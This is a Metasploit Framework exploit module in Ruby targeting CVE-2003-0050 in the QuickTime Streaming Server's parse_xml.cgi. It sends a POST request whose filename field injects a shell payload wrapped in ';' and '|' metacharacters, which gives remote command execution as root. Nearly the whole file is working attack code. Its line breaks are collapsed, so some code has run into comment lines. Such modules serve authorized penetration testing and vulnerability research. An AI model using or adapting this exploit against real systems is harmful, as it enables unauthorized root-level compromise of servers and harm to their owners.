##
# $Id: qtss_parse_xml_exec.rb 96692010-07-0303:13:45Z jduck $
##
##
#This file is part of the Metasploit Framework and may be subject to#redistributionand commercial restrictions. Please see the Metasploit#Framework web site for more information on licensing and terms of use.#http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info ={})super(update_info(info,'Name'=> 'QuickTime Streaming Server parse_xml.cgi Remote Execution','Description'=>%q{
The QuickTime Streaming Server contains a CGI script that is vulnerable
to metacharacter injection, allow arbitrary commands to be executed as root.},'Author'=>['hdm'],'License'=> MSF_LICENSE,'Version'=>'$Revision: 9669 $','References'=>[['OSVDB','10562'],['BID','6954'],['CVE','2003-0050']],'Privileged'=> true,'Payload'=>{'DisableNops'=> true,'Space'=>512,'Compat'=>{'PayloadType'=>'cmd','RequiredCmd'=>'generic perl bash telnet',}},'Platform'=>'unix','Arch'=> ARCH_CMD,'Targets'=>[['Automatic',{}]],'DefaultTarget'=>0,'DisclosureDate'=>'Feb 24 2003'))register_options([
Opt::RPORT(1220)], self.class)
end
def exploit
print_status("Sending post request with embedded command...")
data ="filename="+ Rex::Text.uri_encode(";#{payload.encoded}|")
response =send_request_raw({'uri'=>"/parse_xml.cgi",'method'=>'POST','data'=> data,'headers'=>{'Content-Type'=> 'application/x-www-form-urlencoded','Content-Length'=> data.length,}},3)#If the upload worked, the server tries to redirect us to some info#aboutthe file we just savedif response and response.code !=200print_error("Server returned non-200 status code (#{response.code})")
end
handler
end
end
